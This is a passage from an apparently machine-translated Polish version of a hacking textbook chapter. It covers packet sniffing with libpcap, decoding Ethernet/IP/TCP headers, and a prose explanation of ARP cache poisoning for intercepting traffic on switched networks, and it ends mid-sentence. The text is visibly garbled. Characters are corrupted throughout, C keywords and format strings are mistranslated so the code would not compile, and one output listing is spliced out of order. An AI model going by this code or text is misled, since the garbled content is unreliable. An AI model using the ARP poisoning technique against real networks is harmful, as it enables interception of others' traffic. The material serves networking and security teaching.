Standaryzowana biblioteka programowania o nazwie libpcap mo�e by� u�ywana do wyg�adzania niesp�jno�ci surowych gniazd. Funkcje w tej bibliotece nadal wykorzystuj� surowe gniazda, aby wykona� swoj� magi�, ale biblioteka wie, jak poprawnie pracowa� z nieprzetworzonymi gniazdami na wielu architekturach. Zar�wno tcpdump, jak i dsniff u�ywaj� libpcap, co pozwala im kompilowa� si� ze wzgl�dn� �atwo�ci� na dowolnej platformie. Przeredagujmy program sniffer�w pakiet�w surowych u�ywaj�c funkcji libpcap zamiast w�asnych. Te funkcje s� do�� intuicyjne, wi�c om�wimy je za pomoc� poni�szego wykazu kod�w.

pcap_sniff.c

#include < pcap.h >

#include "hacking.h"

void pcap_fatal (const char * failed_in, const char * errbuf) {

printf ("B��d krytyczny w% s:% s \ n", failed_in, errbuf);

wyj�cie (1);

}

Najpierw do��czono pcap.h, zapewniaj�c r�ne struktury i definicje u�ywane przez funkcje pcap. Ponadto napisa�em funkcj� pcap_fatal () do wy�wietlania b��d�w krytycznych. Funkcje pcap u�ywaj� bufora b��d�w do zwracania komunikat�w o b��dach i statusie, wi�c ta funkcja s�u�y do wy�wietlania tego bufora u�ytkownikowi.

int main () {

struct pcap_pkthdr nag��wek;

const u_char * pakiet;

char errbuf [PCAP_ERRBUF_SIZE];

urz�dzenie char *;

pcap_t * pcap_handle;

int i;

Zmienna errbuf to wspomniany wcze�niej bufor b��d�w, kt�rego rozmiar pochodzi z definicji w pliku pcap.h, ustawionej na 256. Zmienna nag��wka to struktura pcap_pkthdr zawieraj�ca dodatkowe informacje przechwytywania o pakiecie, na przyk�ad kiedy zosta�a przechwycona i jej d�ugo��. Wska�nik pcap_handle dzia�a podobnie jak deskryptor pliku, ale s�u�y do odniesienia do obiektu przechwytuj�cego pakiety.

device = pcap_lookupdev (errbuf);

if (device == NULL)

pcap_fatal ("pcap_lookupdev", errbuf);

printf ("W�chanie na urz�dzeniu% s \ n", urz�dzenie);

Funkcja pcap_lookupdev () szuka odpowiedniego urz�dzenia do sniffowania. To urz�dzenie jest zwracane jako wska�nik �a�cuchowy odwo�uj�cy si� do pami�ci funkcji statycznych. Dla naszego systemu zawsze b�dzie to / dev / eth0, chocia� b�dzie inaczej w systemie BSD. Je�li funkcja nie mo�e znale�� odpowiedniego interfejsu, zwr�ci warto�� NULL.

pcap_handle = pcap_open_live (device, 4096, 1, 0, errbuf);

if (pcap_handle == NULL)

pcap_fatal ("pcap_open_live", errbuf);

Podobnie jak funkcja gniazda i funkcja otwierania pliku, funkcja pcap_open_live () otwiera urz�dzenie przechwytuj�ce pakiety, zwracaj�c do niego uchwyt. Argumentami dla tej funkcji s�: urz�dzenie do sniffowania, maksymalny rozmiar pakietu, zmienna flaga, warto�� limitu czasu i wska�nik do bufora b��d�w. Poniewa� chcemy przechwyci� w trybie mieszanym, zmienna flaga jest ustawiona na 1.

dla (i = 0; i <3; i ++) {

packet = pcap_next (pcap_handle, & header);

printf ("Mam pakiet% d bajt�w \ n", header.len);

dump (packet, header.len);

}

pcap_close (pcap_handle);

}

Na koniec, p�tla przechwytywania pakiet�w u�ywa pcap_next () do przechwycenia nast�pnego pakietu. Ta funkcja jest przekazywana do pliku pcap_handle i wska�nika do struktury pcap_pkthdr, dzi�ki czemu mo�e wype�ni� go szczeg�ami przechwytywania. Funkcja zwraca wska�nik do pakietu, a nast�pnie drukuje pakiet, pobieraj�c jego d�ugo�� z nag��wka przechwytywania. Nast�pnie pcap_close () zamyka interfejs przechwytywania. Po skompilowaniu tego programu biblioteki pcap musz� by� po��czone. Mo�na to zrobi� za pomoc� flagi -l z GCC, jak pokazano na wyj�ciu poni�ej. Biblioteka pcap zosta�a zainstalowana w tym systemie, wi�c biblioteka i pliki do��czane znajduj� si� ju� w standardowych lokalizacjach, o kt�rych wie kompilator.

reader@ hacking: ~ / booksrc $ gcc -o pcap_sniff pcap_sniff.c

/tmp/ccYgieqx.o: W funkcji `main ':

pcap_sniff.c :(. text + 0x1c8): niezdefiniowane odwo�anie do `pcap_lookupdev '

pcap_sniff.c :(. text + 0x233): niezdefiniowane odniesienie do `pcap_open_live '

pcap_sniff.c :(. text + 0x282): niezdefiniowane odniesienie do `pcap_next '

pcap_sniff.c :(. text + 0x2c2): niezdefiniowane odniesienie do `pcap_close '

collect2: ld zwr�ci� 1 status wyj�cia

reader@ hacking: ~ / booksrc $ gcc -o pcap_sniff pcap_sniff.c -l pcap

reader@ hacking: ~ / booksrc $ ./pcap_sniff

B��d krytyczny w pcap_lookupdev: nie znaleziono odpowiedniego urz�dzenia

reader@ hacking: ~ / booksrc $ sudo ./pcap_sniff

Sniffowanie na urz�dzeniu eth0

Mam pakiet o d�ugo�ci 82 bajt�w

00 01 6c eb 1d 50 00 01 29 15 65 b6 08 00 45 10 | ..l..P ..). e ... E.

00 44 1e 39 40 00 40 06 46 20 c0 a8 2a 01 c0 a8 | .D.9 @. @. F .. * ...

2a f9 8b 12 1e d2 ac 14 cf c7 e5 10 6c c9 80 18 | * ........... l ...

05 b4 54 1a 00 00 01 01 08 0a 26 b6 a7 76 02 3c | ..T ......... .. v. <

37 1e 74 68 69 73 20 69 73 20 61 20 74 65 73 74 | 7. to jest test

0d 0a | ..

Mam pakiet 66-bajtowy

00 01 29 15 65 b6 00 01 6c eb 1d 50 08 00 45 00 | ..). e ... l..P..E.

00 34 3d 2c 40 00 40 06 27 4d c0 a8 2a f9 c0 a8 | .4 =, @. @. 'M .. * ...

2a 01 1e d2 8b 12 e5 10 6c c9 ac 14 cf d7 80 10 | * ....... l .......

05 a8 2b 3f 00 00 01 01 08 0a 02 47 27 6c 26 b6 | .. +? ....... G'l &.

a7 76 | .v

Mam pakiet o d�ugo�ci 84 bajt�w

00 01 6c eb 1d 50 00 01 29 15 65 b6 08 00 45 10 | ..l..P ..). e ... E.

00 46 1e 3a 40 00 40 06 46 1d c0 a8 2a 01 c0 a8 | .F.: @. @. F ... * ...

2a f9 8b 12 1e d2 ac 14 cf d7 e5 10 6c c9 80 18 | * ........... l ...

05 b4 11 b3 00 00 01 01 08 0a 26 b6 a9 c8 02 47 | ..........&....SOL

27 6c 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | "AAAAAAAAAAAAAAA

41 41 0d 0a | AA ..

reader@ hacking: ~ / booksrc $

Zauwa�, �e istnieje wiele bajt�w poprzedzaj�cych przyk�adowy tekst w pakiecie, a wiele z tych bajt�w jest podobnych. Poniewa� s� to przechwycone pakiety raw, wi�kszo�� z tych bajt�w to warstwy informacji nag��wkowych dla Ethernetu, IP i TCP.

Powr�t

15.08.2020

Dekodowanie warstw

W przechwytywanych pakietach najbardziej zewn�trzn� warstw� jest Ethernet, kt�ry jest r�wnie� najni�sz� widoczn� warstw�. Ta warstwa s�u�y do przesy�ania danych mi�dzy punktami ko�cowymi Ethernet z adresami MAC. Nag��wek dla tej warstwy zawiera �r�d�owy adres MAC, docelowy adres MAC i 16-bitow� warto�� opisuj�c� typ pakietu Ethernet. W systemie Linux struktura tego nag��wka jest zdefiniowana w /usr/include/linux/if_ethernet.h, a struktury nag��wka IP i nag��wka TCP znajduj� si� w /usr/include/netinet/ip.h i / usr / include / netinet / tcp.h, odpowiednio. Kod �r�d�owy tcpdump ma r�wnie� struktur� dla tych nag��wk�w, lub mo�emy po prostu tworzy� w�asne struktury nag��wk�w na podstawie specyfikacji RFC. Lepsze zrozumienie mo�na uzyska�, pisz�c w�asne struktury, wi�c wykorzystajmy definicje struktur jako wskaz�wki do stworzenia w�asnych struktur nag��wk�w pakiet�w, kt�re zostan� w��czone do sieci hakowania. h. Najpierw przyjrzyjmy si� istniej�cej definicji nag��wka Ethernet

/usr/include/if_ether.h

#define ETH_ALEN 6 /* Octets in one ethernet addr */

#define ETH_HLEN 14 /* Total octets in header */

/*

* This is an Ethernet frame header.

*/

struct ethhdr {

unsigned char h_dest[ETH_ALEN]; /* Destination eth addr */

unsigned char h_source[ETH_ALEN]; /* Source ether addr */

__be16 h_proto; /* Packet type ID field */

} __attribute__((packed));

Ta struktura zawiera trzy elementy nag��wka Ethernet. Deklaracja zmiennej __be16 okazuje si� by� definicj� typu dla 16-bitowej liczby ca�kowitej bez znaku. Mo�na to okre�li� przez rekursywn� grepping dla definicji typu w plikach do��czania.

reader@hacking:~/booksrc $

$ grep -R "typedef.*__be16" /usr/include

/usr/include/linux/types.h:typedef __u16 __bitwise __be16;

$ grep -R "typedef.*__u16" /usr/include | grep short

/usr/include/linux/i2o-dev.h:typedef unsigned short __u16;

/usr/include/linux/cramfs_fs.h:typedef unsigned short __u16;

/usr/include/asm/types.h:typedef unsigned short __u16;

$

Plik include r�wnie� okre�la d�ugo�� nag��wka Ethernet w ETH_HLEN jako 14 bajt�w. To si� sumuje, poniewa� �r�d�owe i docelowe adresy MAC u�ywaj� 6 bajt�w ka�dy, a pole typu pakietu jest 16-bitow� kr�tk� liczb� ca�kowit�, kt�ra zajmuje 2 bajty. Jednak wiele kompilator�w b�dzie umieszcza� struktury wzd�u� 4-bajtowych granic dla wyr�wnania, co oznacza, �e sizeof (struct ethhdr) zwr�ci nieprawid�owy rozmiar. Aby tego unikn��, nale�y u�y� ETH_HLEN lub sta�ej warto�ci 14 bajt�w dla d�ugo�ci nag��wka Ethernet. Uwzgl�dniaj�c , do��czane s� r�wnie� te inne pliki zawieraj�ce wymagan� definicj� typu __be16. Poniewa� chcemy tworzy� w�asne struktury dla hackowania-network.h, powinni�my usun�� odniesienia do nieznanych definicji typ�w. Dop�ki jeste�my, dajmy tym polom lepsze nazwy.

Dodane do hacking-network.h

#define ETHER_ADDR_LEN 6

#define ETHER_HDR_LEN 14

struct ether_hdr {

unsigned char ether_dest_addr[ETHER_ADDR_LEN]; // Destination MAC address

unsigned char ether_src_addr[ETHER_ADDR_LEN]; // Source MAC address

unsigned short ether_type; // Type of Ethernet packet

};

Mo�emy zrobi� to samo ze strukturami IP i TCP, wykorzystuj�c odpowiednie struktury i diagramy RFC jako odniesienie.

4.4.3.3. From /usr/include/netinet/ip.h

struct iphdr

{

#if __BYTE_ORDER == __LITTLE_ENDIAN

unsigned int ihl:4;

unsigned int version:4;

#elif __BYTE_ORDER == __BIG_ENDIAN

unsigned int version:4;

unsigned int ihl:4;

#else

# error "Please fix < bits/endian.h >"

#endif

u_int8_t tos;

u_int16_t tot_len;

u_int16_t id;

u_int16_t frag_off;

u_int8_t ttl;

u_int8_t protocol;

u_int16_t check;

u_int32_t saddr;

u_int32_t daddr;

/*The options start here. */

};

From RFC 791

Ka�dy element w strukturze odpowiada polom pokazanym na diagramie nag��wka RFC. Od pierwszych dw�ch p�l, Version i IHL (Internet Header Length) maj� tylko cztery bity i nie ma �adnych 4-bitowych typ�w zmiennych w C, definicja nag��wka Linux dzieli bajt w r�ny spos�b w zale�no�ci od kolejno�ci bajt�w hosta . Te pola znajduj� si� w kolejno�ci bajt�w sieciowych, wi�c je�li host jest ma�o-endyjski, IHL powinno pochodzi� przed wersj�, poniewa� kolejno�� bajt�w jest odwrotna. Dla naszych cel�w tak naprawd� nie b�dziemy u�ywa� �adnego z tych p�l, wi�c nie musimy nawet dzieli� bajtu.

Dodano do hacking-network.h

struct ip_hdr {

unsigned char ip_version_and_header_length; // Version and header length

unsigned char ip_tos; // Type of service

unsigned short ip_len; // Total length

unsigned short ip_id; // Identification number

unsigned short ip_frag_offset; // Fragment offset and flags

unsigned char ip_ttl; // Time to live

unsigned char ip_type; // Protocol type

unsigned short ip_checksum; // Checksum

unsigned int ip_src_addr; // Source IP address

unsigned int ip_dest_addr; // Destination IP address

};

Wype�nienie kompilatora, jak wspomniano wcze�niej, spowoduje wyr�wnanie tej struktury na granicy 4-bajtowej przez wype�nienie pozosta�ej cz�ci struktury. Nag��wki IP zawsze maj� 20 bajt�w. Dla nag��wka pakietu TCP odwo�ujemy si� do /usr/include/netinet/tcp.h dla struktury i RFC 793 dla diagramu

From /usr/include/netinet/tcp.h

typedef u_int32_t tcp_seq;

/*

* TCP header.

* Per RFC 793, September, 1981.

*/

struct tcphdr

{

u_int16_t th_sport; /* source port */

u_int16_t th_dport; /* destination port */

tcp_seq th_seq; /* sequence number */

tcp_seq th_ack; /* acknowledgment number */

# if __BYTE_ORDER == __LITTLE_ENDIAN

u_int8_t th_x2:4; /* (unused) */

u_int8_t th_off:4; /* data offset */

# endif

# if __BYTE_ORDER == __BIG_ENDIAN

u_int8_t th_off:4; /* data offset */

u_int8_t th_x2:4; /* (unused) */

# endif

u_int8_t th_flags;

# define TH_FIN 0x01

# define TH_SYN 0x02

# define TH_RST 0x04

# define TH_PUSH 0x08

# define TH_ACK 0x10

# define TH_URG 0x20

u_int16_t th_win; /* window */

u_int16_t th_sum; /* checksum */

u_int16_t th_urp; /* urgent pointer */

};

Z RFC 793

Struktura tcphdr w Linuksie prze��cza tak�e porz�dkowanie 4-bitowego pola przesuni�cia danych i 4-bitowej sekcji zarezerwowanego pola w zale�no�ci od kolejno�ci bajt�w hosta. Pole przesuni�cia danych jest wa�ne, poniewa� okre�la rozmiar nag��wka TCP o zmiennej d�ugo�ci. Mog�e� zauwa�y�, �e struktura tcphdr w Linuksie nie oszcz�dza miejsca na opcje TCP. Wynika to z faktu, �e RFC definiuje to pole jako opcjonalne. Rozmiar nag��wka TCP zawsze b�dzie wynosi� 32 punkty, a przesuni�cie danych m�wi nam, ile s��w 32-bitowych znajduje si� w nag��wku. Wi�c rozmiar nag��wka TCP w bajtach jest r�wne polu przesuni�cia danych od czwartego czasu nag��wka. Poniewa� pole przesuni�cia danych jest wymagane do obliczenia rozmiaru nag��wka, podzielimy bajt zawieraj�cy go, zak�adaj�c ma�e bajtowe uporz�dkowanie bajt�w hosta. Pole th_flags struktury tcphdr Linuksa jest zdefiniowane jako 8-bitowa, bez znaku. Warto�ci zdefiniowane poni�ej tego pola s� maskami bitowymi, kt�re odpowiadaj� sze�ciu mo�liwym flagom.

Dodano do hacking-network.h

struct tcp_hdr {

niepodpisany kr�tki tcp_src_port; // �r�d�owy port TCP

niepodpisany kr�tki tcp_dest_port; // Docelowy port TCP

unsigned int tcp_seq; // Numer kolejny TCP

unsigned int tcp_ack; // Numer potwierdzenia TCP

unsigned char zastrze�one: 4; // 4 bity z 6 bit�w zarezerwowanej przestrzeni

unsigned char tcp_offset: 4; // Przesuni�cie danych TCP dla ma�ego hosta

unsigned char tcp_flags; // Flagi TCP (i 2 bity z zarezerwowanej przestrzeni)

#define TCP_FIN 0x01

#define TCP_SYN 0x02

#define TCP_RST 0x04

#define TCP_PUSH 0x08

#define TCP_ACK 0x10

#define TCP_URG 0x20

niepodpisany kr�tki tcp_window; // Rozmiar okna TCP

niepodpisany kr�tki tcp_checksum; // Suma kontrolna TCP

unsigned short tcp_urgent; // Pilny wska�nik TCP

};

Teraz, gdy nag��wki s� zdefiniowane jako struktury, mo�emy napisa� program do dekodowania warstwowych nag��wk�w ka�dego pakietu. Ale zanim to zrobimy, porozmawiajmy przez chwil� o libpcap. Ta biblioteka ma funkcj� o nazwie pcap_loop (), kt�ra jest lepszym sposobem przechwytywania pakiet�w ni� zap�tlanie w wywo�aniu pcap_next (). Bardzo niewiele program�w faktycznie u�ywa pcap_next (), poniewa� jest niezdarna i nieefektywna. Funkcja pcap_loop () u�ywa funkcji wywo�ania zwrotnego. Oznacza to, �e funkcja pcap_loop () jest przekazywana wska�nikowi funkcji, kt�ry jest wywo�ywany za ka�dym razem, gdy przechwytywany jest pakiet. Prototyp dla pcap_loop () wygl�da nast�puj�co:

int pcap_loop (pcap_t * uchwyt, int count, wywo�anie zwrotne pcap_handler, u_char * args);

Pierwszy argument to uchwyt pcap, nast�pny to liczba przechwyconych pakiet�w, a trzecia to wska�nik funkcji do funkcji wywo�ania zwrotnego. Je�li argument count zostanie ustawiony na -1, zap�tli si�, a� program si� z niego wy��czy. Ostatnim argumentem jest opcjonalny wska�nik, kt�ry zostanie przekazany do funkcji wywo�ania zwrotnego. Naturalnie funkcja wywo�ania zwrotnego musi pod��a� za okre�lonym prototypem, poniewa� funkcja pcap_loop () musi wywo�ywa� t� funkcj�. Funkcj� zwrotn� mo�na nazwa� dowolnie, ale argumenty musz� wygl�da� nast�puj�co:

void callback (u_char * args, const struct pcap_pkthdr * cap_header, const u_char * packet);

Pierwszy argument jest po prostu opcjonalnym argumentem argumentu z ostatniego argumentu na pcap_loop (). Mo�e by� u�ywany do przekazywania dodatkowych informacji do funkcji wywo�ania zwrotnego, ale nie b�dziemy tego u�ywa�. Nast�pne dwa argumenty powinny by� znane z pcap_next (): wska�nik do nag��wka przechwytywania i wska�nik do samego pakietu. Poni�szy przyk�adowy kod wykorzystuje pcap_loop () z funkcj� wywo�ania zwrotnego do przechwytywania pakiet�w i naszych struktur nag��wkowych w celu ich dekodowania. Ten program zostanie wyja�niony, gdy wy�wietlony zostanie kod.

decode_sniff.c

#include < pcap.h >

#include "hacking.h"

#include "hacking-network.h"

void pcap_fatal(const char *, const char *);

void decode_ethernet(const u_char *);

void decode_ip(const u_char *);

u_int decode_tcp(const u_char *);

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);

int main() {

struct pcap_pkthdr cap_header;

const u_char *packet, *pkt_data;

char errbuf[PCAP_ERRBUF_SIZE];

char *device;

pcap_t *pcap_handle;

device = pcap_lookupdev(errbuf);

if(device == NULL)

pcap_fatal("pcap_lookupdev", errbuf);

printf("Sniffing on device %s\n", device);

pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);

if(pcap_handle == NULL)

pcap_fatal("pcap_open_live", errbuf);

pcap_loop(pcap_handle, 3, caught_packet, NULL);

pcap_close(pcap_handle);

}

Na pocz�tku tego programu deklarowany jest prototyp funkcji zwrotnej, zwany catch_packet (), wraz z kilkoma funkcjami dekoduj�cymi. Ca�a reszta w main () jest w zasadzie taka sama, z tym wyj�tkiem, �e p�tla for zosta�a zast�piona pojedynczym wywo�aniem pcap_loop (). Ta funkcja jest przekazywana do narz�dzia pcap_handle, nakazanego do przechwytywania trzy pakiety i wskaza� funkcj� zwrotn� catch_packet (). Ostatnim argumentem jest NULL, poniewa� nie mamy �adnych dodatkowych danych do przekazania do catch_packet (). Zwr�� te� uwag�, �e funkcja decode_tcp () zwraca warto�� u_int. Poniewa� d�ugo�� nag��wka TCP jest zmienna, ta funkcja zwraca d�ugo�� nag��wka TCP

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char

*packet) {

int tcp_header_length, total_header_size, pkt_data_len;

u_char *pkt_data;

printf("==== Got a %d byte packet ====\n", cap_header->len);

decode_ethernet(packet);

decode_ip(packet+ETHER_HDR_LEN);

tcp_header_length = decode_tcp(packet+ETHER_HDR_LEN+sizeof(struct ip_hdr));

total_header_size = ETHER_HDR_LEN+sizeof(struct ip_hdr)+tcp_header_length;

pkt_data = (u_char *)packet + total_header_size; // pkt_data points to the data

portion.

pkt_data_len = cap_header->len - total_header_size;

if(pkt_data_len > 0) {

printf("\t\t\t%u bytes of packet data\n", pkt_data_len);

dump(pkt_data, pkt_data_len);

} else

printf("\t\t\tNo Packet Data\n");

}

void pcap_fatal(const char *failed_in, const char *errbuf) {

printf("Fatal Error in %s: %s\n", failed_in, errbuf);

exit(1);

}

Funkcja caught_packet () zostaje wywo�ana, gdy pcap_loop () przechwytuje pakiet. Ta funkcja u�ywa d�ugo�ci nag��wka, aby podzieli� pakiet przez warstwy i funkcje dekoduj�ce, aby wydrukowa� szczeg�y nag��wka ka�dej warstwy.

void decode_ethernet(const u_char *header_start) {

int i;

const struct ether_hdr *ethernet_header;

ethernet_header = (const struct ether_hdr *)header_start;

printf("[[ Layer 2 :: Ethernet Header ]]\n");

printf("[ Source: %02x", ethernet_header->ether_src_addr[0]);

for(i=1; i < ETHER_ADDR_LEN; i++)

printf(":%02x", ethernet_header->ether_src_addr[i]);

printf("\tDest: %02x", ethernet_header->ether_dest_addr[0]);

for(i=1; i < ETHER_ADDR_LEN; i++)

printf(":%02x", ethernet_header->ether_dest_addr[i]);

printf("\tType: %hu ]\n", ethernet_header->ether_type);

}

void decode_ip(const u_char *header_start) {

const struct ip_hdr *ip_header;

ip_header = (const struct ip_hdr *)header_start;

printf("\t(( Layer 3 ::: IP Header ))\n");

printf("\t( Source: %s\t", inet_ntoa(ip_header->ip_src_addr));

printf("Dest: %s )\n", inet_ntoa(ip_header->ip_dest_addr));

printf("\t( Type: %u\t", (u_int) ip_header->ip_type);

printf("ID: %hu\tLength: %hu )\n", ntohs(ip_header->ip_id), ntohs(ip_header->ip_len));

}

u_int decode_tcp(const u_char *header_start) {

u_int header_size;

const struct tcp_hdr *tcp_header;

tcp_header = (const struct tcp_hdr *)header_start;

header_size = 4 * tcp_header->tcp_offset;

printf("\t\t{{ Layer 4 :::: TCP Header }}\n");

printf("\t\t{ Src Port: %hu\t", ntohs(tcp_header->tcp_src_port));

printf("Dest Port: %hu }\n", ntohs(tcp_header->tcp_dest_port));

printf("\t\t{ Seq #: %u\t", ntohl(tcp_header->tcp_seq));

printf("Ack #: %u }\n", ntohl(tcp_header->tcp_ack));

printf("\t\t{ Header Size: %u\tFlags: ", header_size);

if(tcp_header->tcp_flags & TCP_FIN)

printf("FIN ");

if(tcp_header->tcp_flags & TCP_SYN)

printf("SYN ");

if(tcp_header->tcp_flags & TCP_RST)

printf("RST ");

if(tcp_header->tcp_flags & TCP_PUSH)

printf("PUSH ");

if(tcp_header->tcp_flags & TCP_ACK)

printf("ACK ");

if(tcp_header->tcp_flags & TCP_URG)

printf("URG ");

printf(" }\n");

return header_size;

}

Funkcje dekoduj�ce przekazuj� wska�nik do pocz�tku nag��wka, kt�ry jest typograficzny do odpowiedniej struktury. Pozwala to na dost�p do r�nych p�l nag��wka, ale wa�ne jest, aby pami�ta�, �e te warto�ci b�d� w kolejno�ci bajt�w sieciowych. Dane pochodz� bezpo�rednio z przewodu, dlatego kolejno�� bajt�w musi zosta� przekonwertowana do u�ycia na procesorze x86

reader@hacking:~/booksrc $ gcc -o decode_sniff decode_sniff.c -lpcap

reader@hacking:~/booksrc $ sudo ./decode_sniff

Sniffing on device eth0

==== Got a 75 byte packet ====

[[ Layer 2 :: Ethernet Header ]]

[ Source: 00:01:29:15:65:b6 Dest: 00:01:6c:eb:1d:50 Type: 8 ]

(( Layer 3 ::: IP Header ))

( Source: 192.168.42.1 Dest: 192.168.42.249 )

( Type: 6 ID: 7755 Length: 61 )

{{ Layer 4 :::: TCP Header }}

{ Src Port: 35602 Dest Port: 7890 }

{ Seq #: 2887045274 Ack #: 3843058889 }

{ Header Size: 32 Flags: PUSH ACK }

9 bytes of packet data

74 65 73 74 69 6e 67 0d 0a | testing..

==== Got a 66 byte packet ====

[[ Layer 2 :: Ethernet Header ]]

[ Source: 00:01:6c:eb:1d:50 Dest: 00:01:29:1(( Layer 3 ::: IP Header ))

( Source: 192.168.42.249 Dest: 192.168.42.1 )

( Type: 6 ID: 15678 Length: 52 )

{{ Layer 4 :::: TCP Header }}

{ Src Port: 7890 Dest Port: 35602 }

{ Seq #: 3843058889 Ack #: 2887045283 }

{ Header Size: 32 Flags: ACK }

No Packet Data

==== Got a 82 byte packet ====

[[ Layer 2 :: Ethernet Header ]]

[ Source: 00:01:29:15:65:b6 Dest: 00:01:6c:eb:1d:50 Type: 8 ]

(( Layer 3 ::: IP Header ))

( Source: 192.168.42.1 Dest: 192.168.42.249 )

( Type: 6 ID: 7756 Length: 68 )

{{ Layer 4 :::: TCP Header }}

{ Src Port: 35602 Dest Port: 7890 }

{ Seq #: 2887045283 Ack #: 3843058889 }

{ Header Size: 32 Flags: PUSH ACK }

16 bytes of packet data

74 68 69 73 20 69 73 20 61 20 74 65 73 74 0d 0a | this is a test..

reader@hacking:~/booksrc $5:65:b6 Type: 8 ]

Po zdekodowaniu nag��wk�w i podzieleniu ich na warstwy, po��czenie TCP / IP jest znacznie �atwiejsze do zrozumienia. Zwr�� uwag�, kt�re adresy IP s� powi�zane z tym adresem MAC. Zwr�� tak�e uwag� na to, �e numer kolejny w dw�ch pakietach z 192.168.42.1 (pierwszy i ostatni pakiet) zwi�ksza si� o dziewi��, poniewa� pierwszy pakiet zawiera� dziewi�� bajt�w rzeczywistych danych: 2887045283 - 2887045274 = 9. Jest to u�ywane przez protok� TCP aby upewni� si�, �e wszystkie dane przybywaj� po kolei, poniewa� pakiety mog� by� op�nione z r�nych powod�w. Pomimo wszystkich mechanizm�w wbudowanych w nag��wki pakiet�w, pakiety s� nadal widoczne dla ka�dego w tym samym segmencie sieci. Protoko�y takie jak FTP, POP3 i telnet transmituj� dane bez szyfrowania. Nawet bez pomocy narz�dzia takiego jak dsniff, do�� trywialne jest atakowanie sieci przez intruza w celu znalezienia nazw u�ytkownik�w i hase� w tych pakietach i wykorzystania ich do z�amania zabezpiecze� innych system�w. Z perspektywy bezpiecze�stwa nie jest to zbyt dobre, wi�c bardziej inteligentne prze��czniki zapewniaj� prze��czane �rodowiska sieciowe.

Powr�t

16.08.2020

Aktywne sniffowanie

W prze��czanym �rodowisku sieciowym pakiety s� wysy�ane tylko do portu, do kt�rego s� przeznaczone, zgodnie z docelowymi adresami MAC. Wymaga to bardziej inteligentnego sprz�tu, kt�ry mo�e tworzy� i utrzymywa� tabel� wi��c� adresy MAC z niekt�rymi portami, w zale�no�ci od tego, kt�re urz�dzenie jest pod��czone do ka�dego portu, jak pokazano tutaj. Zalet� prze��czanego �rodowiska jest to, �e urz�dzenia s� wysy�ane tylko do tych pakiet�w, kt�re s� przeznaczone dla nich, tak �e urz�dzenia promiscuous nie s� w stanie wykry� �adnych dodatkowych pakiet�w. Ale nawet w zmiennym �rodowisku istniej� sprytne sposoby na w�szenie pakiet�w innych urz�dze�; po prostu wydaj� si� nieco bardziej z�o�one. Aby znale�� takie hacki jak te szczeg�y protoko��w musz� zosta� zbadane, a nast�pnie po��czone. Jednym z wa�nych aspekt�w komunikacji sieciowej, kt�r� mo�na manipulowa� w celu uzyskania interesuj�cych efekt�w, jest adres �r�d�owy. W tych protoko�ach nie ma �adnego przepisu, kt�ry zapewni�by, �e adres �r�d�owy w pakiecie rzeczywi�cie jest adresem maszyny �r�d�owej. Akt fa�szowania adresu �r�d�owego w pakiecie nazywa si� fa�szowaniem. Podszywania si� do torby sztuczek znacznie zwi�ksza liczb� mo�liwych atak�w haker�w, poniewa� wi�kszo�� system�w oczekuje, �e adres �r�d�owy b�dzie wa�ny. Podszywanie si� jest pierwszym krokiem do w�chania pakiet�w w prze��czanej sieci. Pozosta�e dwa interesuj�ce szczeg�y znajduj� si� w ARP. Po pierwsze, gdy odpowied� ARP przychodzi z adresem IP, kt�ry ju� istnieje w pami�ci podr�cznej ARP, system odbiorczy zast�pi� wcze�niejsze informacje o adresie MAC z nowym informacji zawartych w odpowiedzi (chyba, �e zapis w pami�ci podr�cznej ARP zosta�a wyra�nie oznaczona jako sta�y). Po drugie, nie s� przechowywane �adne informacje o stanie ruchu ARP, poniewa� wymaga�oby to dodatkowej pami�ci i skomplikowania protoko�u, kt�ry ma by� prosty. Oznacza to, �e systemy przyjm� odpowied� ARP, nawet je�li nie wys�a�y ��dania ARP. Te trzy szczeg�y, gdy s� w�a�ciwie wykorzystywane, umo�liwiaj� intruzowi pods�uchiwanie ruchu sieciowego w sieci komutowanej za pomoc� techniki zwanej przekierowaniem ARP. Atakuj�cy wysy�a sfa�szowane odpowiedzi ARP do niekt�rych urz�dze�, kt�re powoduj� nadpisanie wpis�w pami�ci podr�cznej ARP danymi atakuj�cego. Ta technika nazywa si� zatruwaniem pami�ci podr�cznej ARP. Aby wykry� ruch sieciowy mi�dzy dwoma punktami, A i B, atakuj�cy musi zatru� pami�� podr�czn� ARP A, aby spowodowa�, �e A uwierzy, �e adres IP B jest pod adresem MAC atakuj�cego, a tak�e zatru� pami�� podr�czn� ARP B, aby spowodowa� B, aby uwierzy�, �e adres IP A jest r�wnie� pod adresem MAC atakuj�cego. Potem atakuj�ca aaszyna po prostu musi przekaza� te pakiety do odpowiednich docelowych miejsc docelowych. Nast�pnie ca�y ruch mi�dzy A i B nadal jest dostarczany, ale wszystkie przep�ywaj� przez maszyn� atakuj�cego. Poniewa� A i B owijaj� swoje w�asne nag��wki Ethernet na swoich pakietach w oparciu o ich odpowiednie pami�ci podr�czne ARP, ruch IP A przeznaczony dla B jest faktycznie wysy�any na adres MAC atakuj�cego i na odwr�t. Prze��cznik filtruje ruch wy��cznie na podstawie adresu MAC, wi�c prze��cznik dzia�a tak, jak zosta� zaprojektowany, wysy�aj�c ruch IP A i B, przeznaczony do adresu MAC atakuj�cego, do portu atakuj�cego. Nast�pnie atakuj�cy przewija pakiety IP z odpowiednimi nag��wkami Ethernetu i odsy�a je z powrotem do prze��cznika, gdzie ostatecznie s� kierowane do w�a�ciwego miejsca docelowego. Prze��cznik dzia�a poprawnie; to maszyny ofiary, kt�re zosta�y nak�onione do przekierowania ruchu przez maszyn� atakuj�cego. Ze wzgl�du na limity czasu, komputery ofiary b�d� okresowo wysy�a� prawdziwe ��dania ARP i otrzymywa� odpowiedzi rzeczywistych ARP w odpowiedzi. Aby utrzyma� atak przekierowania, atakuj�cy musi zachowa� zatrute skrzynie ARP maszyny ofiary. Prostym sposobem osi�gni�cia tego jest wysy�anie sfa�szowanych odpowiedzi ARP do A i B w sta�ych odst�pach - na przyk�ad co 10 sekund. Brama to system, kt�ry kieruje ca�y ruch z lokalnej sieci do Internetu. Przekierowanie ARP s� szczeg�lnie interesuj�ce, gdy domy�ln� bram� jest jeden z komputer�w ofiary, poniewa� ruch mi�dzy bram� domy�ln� a innym systemem to ruch internetowy tego systemu. Na przyk�ad, je�li maszyna ma 192.168.0.118 komunikuje si� z bram� pod adresem 192.168.0.1 przez prze��cznik, ruch zostanie 